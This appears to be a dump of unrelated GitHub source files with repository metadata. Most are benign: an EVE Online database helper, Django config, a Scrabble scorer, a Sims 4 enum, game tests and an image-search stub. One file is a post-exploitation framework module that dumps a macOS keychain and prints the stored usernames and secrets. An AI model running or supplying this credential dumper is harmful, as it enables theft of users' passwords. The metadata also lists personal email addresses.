] | jeremy.cheynet@actronika.com |
0a0bbbc2c5c386530dc1a01181c8d65e714baa27 | b39146ab2217325034b197a1398a421d9121b5ea | /DB.py | 6fbd069796528110508776881079f69972edfcf0 | [] | no_license | CalirDeminar/WHHistory | 11ca8523f5b9f399d0812f1a1c3e0aae84868beb | 7e5238ec2aa0c3f62bb25ede204df895395f3274 | refs/heads/master | 2023-05-31T02:10:36.919252 | 2021-06-19T16:21:34 | 2021-06-19T16:21:34 | 366,289,744 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,599 | py | import sqlite3
import requests
import json
import datetime
import Transfer
def split(array, n):
return [array[i * n:(i + 1) * n] for i in range((len(array) + n - 1) // n)]
class DB:
@staticmethod
def set_up_tables(db):
db.execute('''CREATE TABLE IF NOT EXISTS corps (id number, name text)''')
db.execute('''CREATE TABLE IF NOT EXISTS characters (id number, name text)''')
db.execute(
'''CREATE TABLE IF NOT EXISTS transfers ''' +
'''(id text, date text, character number, source number, destination number)'''
)
@staticmethod
def connect():
return sqlite3.connect("./WHHistory.sqlite3")
@staticmethod
def populate_corps():
db = DB.connect()
source_corp_list = list(map(lambda r: r[0], db.execute("SELECT source FROM transfers").fetchall()))
destination_corp_list = list(map(lambda r: r[0], db.execute("SELECT destination FROM transfers").fetchall()))
corp_list = list(set(source_corp_list + destination_corp_list))
for sublist in split(corp_list, 100):
resp = requests.post(
"https://esi.evetech.net/latest/universe/names/?datasource=tranquility&language=en",
data=json.dumps(sublist),
headers={'Accept': 'application/json', 'Accept-Language': 'en', 'Content-Type': 'application/json'}
).json()
for corp in resp:
print(corp)
db.execute("INSERT INTO corps VALUES (?, ?)", (corp["id"], corp["name"]))
db.commit()
@staticmethod
def get_transfers_into_corp(db, corp_id):
raw = db.execute("SELECT * FROM transfers WHERE destination=? ORDER BY date ASC", (corp_id,)).fetchall()
return list(map(lambda t: Transfer.Transfer(t[0], t[1], t[2], t[3], t[4]), raw))
@staticmethod
def get_transfers_out_of_corp(db, corp_id):
raw = db.execute("SELECT * FROM transfers WHERE source=? ORDER BY date ASC", (corp_id,)).fetchall()
return list(map(lambda t: Transfer.Transfer(t[0], t[1], t[2], t[3], t[4]), raw))
@staticmethod
def get_corp_starting_date(db, corp_id):
start_date_string = db.execute("SELECT MIN(date) FROM transfers WHERE destination=?", (corp_id,)).fetchall()[0][0]
return datetime.datetime.fromisoformat(start_date_string.replace("T", " ").replace("Z", ""))
@staticmethod
def get_corp_dict(db):
corps = db.execute("SELECT * FROM corps")
output = {}
for line in corps:
output[line[0]] = line[1]
return output
| [
"edward.firespinner@gmail.com"
] | edward.firespinner@gmail.com |
069ed29ea5a3a37cd84c94ed6edec5292f7aae54 | fe43fda2fa2d70f098d42d8a66498ab89d6dfcec | /projdemo/projdemo/wsgi.py | 2d09f247e93c7b20bd4c04c4f6ef591fc115f0e6 | [] | no_license | Candy128x/chat-bot-dl | be5b0a711f579720744b9ce50b003b6ee0565670 | 5ebd0b1832be82a04947f12fd2da2f41e322e08a | refs/heads/master | 2022-12-12T16:55:05.296789 | 2019-10-27T17:32:45 | 2019-10-27T17:32:45 | 217,884,328 | 0 | 0 | null | 2022-12-08T01:03:48 | 2019-10-27T16:35:46 | Python | UTF-8 | Python | false | false | 393 | py | """
WSGI config for projdemo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'projdemo.settings')
application = get_wsgi_application()
| [
"sondagarashish@gmail.com"
] | sondagarashish@gmail.com |
e67db8d886f24e7f5427f3b95f18f2dd7b50a12c | ce73253b1f80678d27e04f65577d1e24eb1587be | /ScrabbleGame.py | 801a3b588c297bdfc66cc27e691179a4a2926a28 | [] | no_license | karolminuth/Scrabble | 011f7c66f139c6905bddb5e7aafbddba437e3be0 | c0048f6c612035aa6b425a0275c0d94c31be19e9 | refs/heads/master | 2020-04-12T23:30:39.312961 | 2018-12-22T15:26:11 | 2018-12-22T15:26:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,277 | py | import random
class Scrabble:
def __init__(self, f):
self.SCRABBLES_SCORES = [(1, "E A O I N R T L S U"),
(2, "D G"),
(3, "B C M P"),
(4, "F H V W Y"),
(5, "K"),
(8, "J X"),
(10, "Q Z")]
self.LETTER_SCORES = {letter: score for score, letters in self.SCRABBLES_SCORES for letter in letters.split()}
self.file_path = f
self.words = self.read_file_and_change_for_big_letters()
self.values_of_each_word = self.count_value_of_each_word()
self.dict_word_and_value = dict(zip(self.words, self.values_of_each_word))
self.max_value = max(self.values_of_each_word)
self.min_value = min(self.values_of_each_word)
def read_file_and_change_for_big_letters(self):
with open(self.file_path, "r") as read:
lines = read.readlines()
words = []
for i in lines:
words.append(i.strip().upper())
return words
def count_value_of_each_word(self):
values_of_each_word = []
sum_single_word = 0
for word in self.words:
for letter in word:
sum_single_word += self.LETTER_SCORES[letter]
values_of_each_word.append(sum_single_word)
sum_single_word = 0
return values_of_each_word
def check_value_of_entered_word(self, word):
word = word.upper()
sum_of_word = 0
for single_letter in word:
sum_of_word += self.LETTER_SCORES[single_letter]
return sum_of_word
def find_word_equal_searched_value(self, value_of_searched_word):
searched_words = []
for key, value in self.dict_word_and_value.items():
if value == value_of_searched_word:
searched_words.append(key)
searched_word = ''
if len(searched_words) > 0:
random_index_value = random.randrange(len(searched_words))
searched_word = searched_words[random_index_value]
else:
print('There isn\'t a word on this value, nothing to show')
return searched_word
| [
"karolminuth@gmail.com"
] | karolminuth@gmail.com |
7c9e003239f263252fb0adea540bb5e1962cd733 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /src/sims4communitylib/enums/common_species.py | eacddcd09423a491b7c32754f111f81175abc65a | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from sims.sim_info import SimInfo
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonSpecies(CommonInt):
"""Custom Species enum containing all species (including extended species).
"""
INVALID: 'CommonSpecies' = 0
HUMAN: 'CommonSpecies' = 1
SMALL_DOG: 'CommonSpecies' = 2
LARGE_DOG: 'CommonSpecies' = 3
CAT: 'CommonSpecies' = 4
@staticmethod
def get_species(sim_info: SimInfo) -> 'CommonSpecies':
"""Retrieve the CommonSpecies of a sim. Use this instead of CommonSpeciesUtils.get_species to determine a more specific species.
"""
from sims4communitylib.utils.sims.common_species_utils import CommonSpeciesUtils
if CommonSpeciesUtils.is_human(sim_info):
return CommonSpecies.HUMAN
elif CommonSpeciesUtils.is_small_dog(sim_info):
return CommonSpecies.SMALL_DOG
elif CommonSpeciesUtils.is_large_dog(sim_info):
return CommonSpecies.LARGE_DOG
elif CommonSpeciesUtils.is_cat(sim_info):
return CommonSpecies.CAT
return CommonSpecies.INVALID
| [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
a10701bb04036178579d66ffefcb5e613494d8ab | 8540476da336da252dc9b00b66fb8b666981cee6 | /Pattern_25.py | d83bf2de5436d1981beae259ad49acc24cde7628 | [] | no_license | Sagar-VV/Patterns | a54f3cc2a203b565d5f267109b44377b30f411bc | 5891c17c86b0e4547d345ee45fe0f7daa8aaf295 | refs/heads/main | 2023-03-05T01:53:33.935021 | 2021-02-20T08:45:59 | 2021-02-20T08:45:59 | 336,732,347 | 0 | 1 | null | 2021-02-20T08:46:00 | 2021-02-07T07:52:49 | Python | UTF-8 | Python | false | false | 364 | py | # This was the required output, Please find the code below for the same.
# 1
# 2 2
# 3 3 3
# 4 4 4 4
# 5 5 5 5 5
def numpat(n):
for i in range(n,0,-1):
for y in range(i - 1, -1, -1):
print(' ', end=' ')
for z in range (n-i+1):
print(n-i+1, end=' ')
print('')
numpat(5)
| [
"noreply@github.com"
] | Sagar-VV.noreply@github.com |
413f0b7b9ab12d75b76ef41418717665a490a242 | d489eb7998aa09e17ce8d8aef085a65f799e6a02 | /lib/modules/python/collection/osx/keychaindump_decrypt.py | 64015ea23ade2de15835ef86ce40b32770ac9187 | [
"MIT"
] | permissive | fengjixuchui/invader | d36078bbef3d740f95930d9896b2d7dd7227474c | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | refs/heads/master | 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 | MIT | 2019-09-26T11:32:39 | 2019-09-07T11:32:17 | PowerShell | UTF-8 | Python | false | false | 3,432 | py | class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Sandbox-Keychain-Dump',
# list of one or more authors for the module
'Author': ['@import-au'],
# more verbose multi-line description of the module
'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
"WARNING: Will prompt user for access to each key."
"On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
""
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
'Required': False,
'Value': ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = r"""
import subprocess
import re
process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
keychain = process.communicate()
find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
accounts = find_account.findall(keychain[0])
for account in accounts:
print("System: " + account[0])
print("Description: " + account[2])
print("Username: " + account[1])
print("Secret: " + account[3])
"""
return script
| [
"noreply@github.com"
] | fengjixuchui.noreply@github.com |
26612a2b9ce408c47f5b491ad96a276677aaa755 | e4c10bdbbc1dc31fbcff7e46f1c5df1279aa6bac | /plot_energies.py | d43631cffb3a537ac46e4e4ff1b4ab56a89b72c1 | [] | no_license | Yliu566/Uselfuls_Scripts | 898dbf17c8de3058002451178737d1ff25bc2be0 | c8e6296d54dfa57d7afb9a67803c228368741e36 | refs/heads/master | 2021-05-21T18:20:47.420650 | 2020-11-13T14:13:15 | 2020-11-13T14:13:15 | 252,751,186 | 0 | 0 | null | 2020-04-03T14:10:39 | 2020-04-03T14:10:38 | null | UTF-8 | Python | false | false | 1,312 | py | #!/usr/bin/python
# Anna Tomberg
# Plot info from orca run using *.out file
# Last updated : 02-12-2015
import sys
import re
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
# ------------- GET INPUT FILE ------------- #
if len(sys.argv) <= 1:
name = raw_input("Enter path to input: ")
else:
name = sys.argv[1]
fo = open(name, "r")
lines = fo.readlines()
fo.close()
# ------------------------------------------ #
# -------------- EXTRACT INFO -------------- #
print lines[2]
if re.search(" O R C A ", lines[2]):
print 'this is an orca output'
we_continue = True
else :
print 'dunno this output format!'
we_continue = False
if we_continue:
Energy = []
for line in lines:
if re.search("Total Energy : ", line):
temp = line.split()[3]
Energy.append(temp)
# convert string to float
Energy=[(lambda x: float(x))(x) for x in Energy]
# ------------- PLOTTING STUFF ------------- #
# If only SCF cycle, plot OPTION 1.
# If got passed 1st SCF cycle, plot OPTION 2.
# ------------------------------------------ #
# OPTION 1:
if Energy != []:
plt.figure()
ax = plt.subplot(111)
plt.title("Energy")
ax.yaxis.set_major_formatter(FormatStrFormatter('%.2f'))
ax.plot(list(range(1, len(Energy)+1)), Energy, 'r-')
plt.show()
| [
"anna.tomberg@gmail.com"
] | anna.tomberg@gmail.com |
c1f9bdee162eb8870f5e99d07e1132ddbc03d481 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_14019.py | 78da2db51c32750262ee6905da1673496452c3d7 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | # If comparison statements in Python
random.randint
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
97cf5f474dbcb921ff3bb64b3d27c55e10d7af24 | c0aa558e50e03250a7b397536aaa5a50cd6adb1d | /abstract/models.py | 987d640bae74e6aafc8169671add22273bdd999a | [] | no_license | Stevvvvvi/djangoapifinal | 04264ee0de4fa0d116428b04c2ab20715b8a5530 | 9eca3111f6bb2177a01cadd6b0f38222f6ab85a3 | refs/heads/main | 2023-07-26T21:09:24.487022 | 2021-08-22T10:33:45 | 2021-08-22T10:33:45 | 396,653,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | from django.db import models
from django.utils import timezone
class AbstractModel(models.Model):
created = models.DateTimeField(editable=False)
modified = models.DateTimeField(editable=False)
def save(self, *args, **kwargs):
''' On save, update timestamps '''
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AbstractModel, self).save(*args, **kwargs)
class Meta:
abstract=True
ordering=('-created',) | [
"lly363893886@gmail.com"
] | lly363893886@gmail.com |
19638813a0f884202f522998d7ee776521014b31 | ba712db29e8bf09b506ec4c1adbc2b3eeb359098 | /InputOutputOperations/argv_demo.py | a60ab784f9615d7fdbd6fc258d10286f70ccb271 | [] | no_license | Prog-keith/Learning_Python | a7c20b6e42fb59282d0aba109bc70dc0bb8bf553 | c949862c8817e6ac73bb41ff8ad7a7811a432870 | refs/heads/main | 2023-08-27T21:37:49.107754 | 2021-10-14T11:39:38 | 2021-10-14T11:39:38 | 416,299,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | '''Accept command line arguments to the module'''
program = 'agrv_demo.py'
source = 'default.src'
dest = 'default.dst'
def show_config():
print('Here is the currant configuration : ')
print('Program : %s' % program)
print('Source : %s' % source)
print('Destination : &s' % dest)
if __name__ == '__main__' :
import sys
print('here is sys.argv : %s ' % sys.argv)
if len(sys.argv) > 2: #Two or more arguments passed
program, source, dest = sys.argv[:3]
elif len(sys.argv) > 1: #Only one argument passed
program, source = sys.argv[:2]
else: #No arguments passed
program = sys.argv[0]
show_config()
| [
"noreply@github.com"
] | Prog-keith.noreply@github.com |
683dd671bc35020db12458343d8ca3a19d8b0fdb | 3090af6950b8edb465c5e67ac5a88bf6428330f4 | /ESP32/main_sendRandom.py | 33bd84c35132ea80749bfc51d03df502451991a1 | [] | no_license | NickBaik/SAP_IoT_Test | 8f63b8d54f940d7f61b43716b0dd5f3dcd95291b | f505b3aaf742169ac3be30812a2bcda40cba2149 | refs/heads/master | 2021-04-12T12:04:24.024763 | 2018-04-13T01:56:39 | 2018-04-13T01:56:39 | 126,653,173 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | import network
from time import sleep
from umqtt.simple import MQTTClient
from machine import Pin
from dht import DHT11
import random
station = network.WLAN(network.STA_IF)
station.active(True)
station.connect("Baek","82388238")
sleep(5)
SERVER = '192.168.43.251'
CLIENT_ID = 'ESP32_DHT11_Sensor'
TOPIC = b'temp_humidity'
client = MQTTClient(CLIENT_ID, SERVER)
client.connect()
while True:
try:
input_random1=random.randint(0,100)
msg = str(input_random1)
client.publish(TOPIC, msg)
print(msg)
except OSError:
print('Failed to read sensor.')
sleep(4)
| [
"sollip1228@gmail.com"
] | sollip1228@gmail.com |
eba8df431abff8bd3ccc3b669c965283f356be6d | 1c6db771456c0ad1c09d7aebf8c202cdd3f20cb8 | /src/driver/chrome_driver.py | 61a1092763ddc54aa0fc1946c513554ac941c5c0 | [] | no_license | dicebattle/DynamicCrawler | e964badf57d127e0d0b536e92c5810c9184aad93 | 3c9e0b490c44280ffb61e598b14761d237de2334 | refs/heads/master | 2021-01-23T01:08:32.730729 | 2017-06-09T17:43:07 | 2017-06-09T17:43:07 | 85,880,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | import os
from selenium import webdriver
from driver.abstract_driver import AbstractDriver
class ChromeDriver(AbstractDriver):
def load_webpage(self, url):
self.driver.get(url)
raw_html = self.driver.page_source
def __del__(self):
super().__del__()
self.driver.quit()
def __init__(self):
super().__init__()
chrome_options = webdriver.ChromeOptions()
prefs = {"profile.managed_default_content_settings.images": 2}
chrome_options.add_experimental_option("prefs", prefs)
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-gpu")
self.driver = webdriver.Chrome(os.getcwd() + '/../lib/chromedriver',
chrome_options=chrome_options) | [
"dicebattle@gmail.com"
] | dicebattle@gmail.com |
fd993c1ce8b8ab1eac686e7002a4c8c17b291d47 | 727b31431a9a5cf5c2c7c9c98cf610b274cc9c9a | /WIFI_similarity/Init_process_wifi.py | 2712e29b1ca39de993e537db159e359bdeba48e4 | [] | no_license | wangfengfighting/GPS_Similar | 46c9b97c92d055a7c7d96288ae11727c7ecfe927 | 0f1d5da6820782284c6e90eeda83d4e3fb73a19f | refs/heads/master | 2021-01-21T04:59:24.846677 | 2016-07-26T03:17:08 | 2016-07-26T03:17:08 | 44,645,011 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | # coding: utf-8
__author__ = 'Administrator'
from getDir import GetDirName
import os
import json
import numpy as np
import sys
def get_fenlei_user():
wifi_path=[]
getdir=GetDirName()
parent_path = os.path.dirname(os.getcwd())
AllUserFiles,AllFiles,other=getdir.getUserFiles(parent_path+os.sep+'starlog')
for path_file in other:
for i in range(len(path_file)):
path_file_name=parent_path+path_file[i]+os.sep+'wifi.txt'
wifi_path.append(path_file_name)
return wifi_path
def wifi_file_filter(wifi_file_path):
for path in wifi_file_path:
if os.path.exists(path):
reload(sys)
sys.setdefaultencoding( "utf-8" )
f=open(path.replace('wifi.txt','Downwifi.txt'),'w')
f.writelines('SSID,BSSID,state,time,level')
f.write('\n')
prefile=open(path,'r').readlines()
for line in prefile:
s=json.loads(line)
#print s['Wifi']['SSID']
if s['Wifi']['SSID']=='':
f.write('HIDE')
elif not s['Wifi']['SSID'].strip():
f.write('Unkonwn')
else:
f.write(str(s['Wifi']['SSID']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['BSSID']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['state']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['time']).strip('\n'))
f.write(',')
f.write(str(s['Wifi']['level']).strip('\n'))
f.write('\n')
f.close()
else:
pass
if __name__=='__main__':
#print get_fenlei_user()
wifi_file_filter(get_fenlei_user()) | [
"757001119@qq.com"
] | 757001119@qq.com |
574ef5e88ee135257b5f436296d7e5aa2e4dc576 | f87c0fabadacc1db3892de6aae6792e870866999 | /DjangoDemo/wsgi.py | 621037ca69a528ad7c44d9f4dd4f3e4365f3b914 | [
"Apache-2.0"
] | permissive | wangjianxiandev/DjangoDemo | c263c013bee615e21e9878af5dec59202a4260b8 | 36dc24f64745b3bec1aedf857525aaa9961a3e46 | refs/heads/master | 2022-12-23T20:47:59.755777 | 2019-05-10T00:08:37 | 2019-05-10T00:08:37 | 155,325,131 | 0 | 1 | Apache-2.0 | 2022-06-21T21:30:02 | 2018-10-30T04:37:58 | Python | UTF-8 | Python | false | false | 430 | py | """
WSGI config for DjangoDemo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from dj_static import Cling
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjangoDemo.settings')
application = Cling(get_wsgi_application()) | [
"jianxianwang198@163.com"
] | jianxianwang198@163.com |
72459b0f1f791bab9d41e5408b39c9a351bd2ddc | c92d6e56c9859d80a57c43898123b4ae6b7128e0 | /chatbot_tutorial/migrations/0015_allcalls_user.py | 07c4624c8331ab96b75b72b5ff4ca1dc14c5995b | [
"MIT"
] | permissive | Jishin4477/Djangobot | 566ee8fabdf443b8bded9c82e8808a26317364a2 | f7a4d78b8d12253a8e6726931c85ee76f436d440 | refs/heads/main | 2023-06-08T02:59:03.707985 | 2023-05-31T06:43:33 | 2023-05-31T06:43:33 | 354,270,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 677 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-04-02 15:55
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chatbot_tutorial', '0014_remove_allcalls_user'),
]
operations = [
migrations.AddField(
model_name='allcalls',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"jishinc@growthplug.com"
] | jishinc@growthplug.com |
ae46f6212c12031979831196073e280f171689bd | 082adc8ad69722c1d927e7a3a799a8667cf51a9c | /tfs/core/layer/fc.py | bfe77246e9b93474fa0dfae7482082f2a1d7fe3b | [] | no_license | crackhopper/InitCNNKernel | c04164365367a71e706c46391ce6a9b51b0f9793 | d0e5e8def9ef01dd0f25d191fc9f9da9acab6d23 | refs/heads/master | 2021-09-04T02:21:30.971073 | 2018-01-14T15:56:29 | 2018-01-14T15:56:29 | 115,786,040 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | import tensorflow as tf
import numpy as np
import tfs.core.initializer.init_func as init
from tfs.core.layer import ops
from tfs.core.layer.base import Layer
class FullyConnect(Layer):
def __init__(self,
net,
outdim,
activation = ops.relu,
name=None,
print_names=['outdim','activation']
):
vtable = locals()
del vtable['self']
del vtable['net']
super(FullyConnect,self).__init__(net,**vtable)
def _build(self):
inTensor = self._in
input_shape = inTensor.get_shape()
if input_shape.ndims == 4:
# The input is spatial. Vectorize it first.
dim = np.prod(input_shape.as_list()[1:])
output = tf.reshape(inTensor, [-1,dim])
else:
output, dim = (inTensor, input_shape[-1].value)
weights = self._make_variable('weights', shape=[dim, self.param.outdim],init=init.xavier())
biases = self._make_variable('biases', [self.param.outdim],init=init.constant())
output = tf.nn.xw_plus_b(output, weights, biases,name=self.name)
if self.param.activation:
output= self.param.activation(output, name=self.name)
return output
def _inverse(self):
outTensor = self._inv_in
name = 'inv_'+self.name
act = self.param.activation
if act:
outTensor = act(outTensor)
weights = tf.transpose(self._variables['weights'])
inv_fc = tf.matmul(outTensor,weights)
shape = self._in.get_shape().as_list()
shape[0]=-1
inv_fc = tf.reshape(inv_fc,shape)
print('inv_fc '+str(outTensor.get_shape().as_list()) + '->' + str(inv_fc.get_shape().as_list()))
return inv_fc
| [
"Xiang Li"
] | Xiang Li |
6ad85fa1a294e558957c5db9cd527a55dc2c2245 | 8d863809a4e9a1a907e2e12845d5b7dad7353035 | /tests/test_my_custom_player.py | 9322b854f59bc894fc66b19bd00de9fdb5012fc8 | [
"MIT"
] | permissive | AekachaiTang/AINDP3 | c2cbba5832f3115213edd413cf422a942111bbbf | b50a3d522f4e7a2b74b294a141804873ea8d8182 | refs/heads/master | 2021-04-12T16:50:01.096182 | 2020-03-22T08:54:01 | 2020-03-22T08:54:01 | 249,093,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py |
import unittest
from collections import deque
from random import choice
from textwrap import dedent
from isolation import Isolation, Agent, fork_get_action, play
from sample_players import RandomPlayer
from my_custom_player import CustomPlayer
class BaseCustomPlayerTest(unittest.TestCase):
def setUp(self):
self.time_limit = 150
self.move_0_state = Isolation()
self.move_1_state = self.move_0_state.result(choice(self.move_0_state.actions()))
self.move_2_state = self.move_1_state.result(choice(self.move_1_state.actions()))
terminal_state = self.move_2_state
while not terminal_state.terminal_test():
terminal_state = terminal_state.result(choice(terminal_state.actions()))
self.terminal_state = terminal_state
class CustomPlayerGetActionTest(BaseCustomPlayerTest):
def _test_state(self, state):
agent = CustomPlayer(state.ply_count % 2)
action = fork_get_action(state, agent, self.time_limit)
self.assertTrue(action in state.actions(), dedent("""\
Your agent did not call self.queue.put() with a valid action \
within {} milliseconds from state {}
""").format(self.time_limit, state))
def test_get_action_player1(self):
""" get_action() calls self.queue.put() before timeout on an empty board """
self._test_state(self.move_0_state)
def test_get_action_player2(self):
""" get_action() calls self.queue.put() before timeout as player 2 """
self._test_state(self.move_1_state)
def test_get_action_midgame(self):
""" get_action() calls self.queue.put() before timeout in a game in progress """
self._test_state(self.move_2_state)
def test_get_action_terminal(self):
""" get_action() calls self.queue.put() before timeout when the game is over """
self._test_state(self.terminal_state)
class CustomPlayerPlayTest(BaseCustomPlayerTest):
def test_custom_player(self):
""" CustomPlayer successfully completes a game against itself """
agents = (Agent(CustomPlayer, "Player 1"),
Agent(CustomPlayer, "Player 2"))
initial_state = Isolation()
winner, game_history, _ = play((agents, initial_state, self.time_limit, 0))
state = initial_state
moves = deque(game_history)
while moves: state = state.result(moves.popleft())
self.assertTrue(state.terminal_test(), "Your agent did not play until a terminal state.") | [
"noreply@github.com"
] | AekachaiTang.noreply@github.com |
61ddc0bcbbe298d39cd724efda1b2e1fef76e38a | 92d2e5f894c4ad714497246f2ebfb669f195f5c6 | /PageSpider/utilities/database_utilities.py | 2548027b12cbacf79e566058867bd36a26189e25 | [] | no_license | glennsobs/glennsobs | 3b800c609c1b14883f36e2d81bfb50f3d2f0b799 | d0307371102436c1ae151e9f6a8813e1f56b1a29 | refs/heads/master | 2020-07-03T05:59:46.259167 | 2019-09-08T21:04:49 | 2019-09-08T21:04:49 | 201,808,020 | 0 | 0 | null | 2019-08-16T01:03:23 | 2019-08-11T19:43:47 | null | UTF-8 | Python | false | false | 197 | py | def create_database(database_path: str):
#todo: generate database
pass
def save_words_to_database(database_path:str, words_list: list):
#todo: save the words to the database
pass
| [
"54005758+glennsobs@users.noreply.github.com"
] | 54005758+glennsobs@users.noreply.github.com |
497a37accb9bca07ff11a2b40b7c4eef68a23c2b | 4ffa02a24fcfc553c767ce581f8a9c1433cdda18 | /Algorithms on Graphs/week2_graph_decompostion2/1_cs_curriculum.py | 780d20c599b4fb68cc2fa1e8924487c595acd3c6 | [] | no_license | chensandian/Coursera_Data_structure_and_algorithms | 9198e24f3f73968e30fb0d5d01bb1ab3a7a159fd | ff166b743a6efd7d252397a157a2613f3beb73cd | refs/heads/main | 2023-07-15T07:52:29.116465 | 2021-08-23T00:13:44 | 2021-08-23T00:13:44 | 385,505,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | # Uses python3
import sys
def acyclic(adj):
visited = [0 for _ in range(len(adj))]
rec_stack = [0 for _ in range(len(adj))]
for i in range(len(adj)):
if not visited[i]:
if dfs(adj, i, visited, rec_stack):
return 1
return 0
def dfs(adj, x, visited, rec_stack):
# this will mark the points we traveled
visited[x] = 1
# this will mark the points we traveled but come back due to dead end
# 1 marks we go pass; 0 marks we get back
rec_stack[x] = 1
for neighbor in adj[x]:
if visited[neighbor] == 0 and dfs(adj, neighbor, visited, rec_stack):
return 1
elif rec_stack[neighbor] == 1:
return 1
# if we get to this part, that means we reached a dead end
rec_stack[x] = 0
return 0
if __name__ == '__main__':
input = sys.stdin.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(data[0:(2 * m):2], data[1:(2 * m):2]))
adj = [[] for _ in range(n)]
for (a, b) in edges:
adj[a - 1].append(b - 1)
print(acyclic(adj))
| [
"noreply@github.com"
] | chensandian.noreply@github.com |
3ab2e88cab6ef1dcb9caf2b4448277d18674f61f | 2d307cb2da18f35e2d4e73f6e042a48cdcd8af5e | /finder.py | c6b440ead672bdf61860f237a09a569b0960c9b5 | [] | no_license | andrewcunningham33/Where-s-Waldo-Finder | f6c1ca64e8aadf5c9ceb0892a2528ae6cf7bffb0 | be64784c1a2375372410342db9a744a06d98cd03 | refs/heads/master | 2022-07-26T00:35:26.667876 | 2020-05-19T13:10:30 | 2020-05-19T13:10:30 | 265,250,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,051 | py | # import the necessary packages
import numpy as np
import argparse
import imutils
from matplotlib import pyplot as plt
import cv2
# Use command line arguments to read puzzles
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--puzzle", required = True,
help = "Path to the puzzle image")
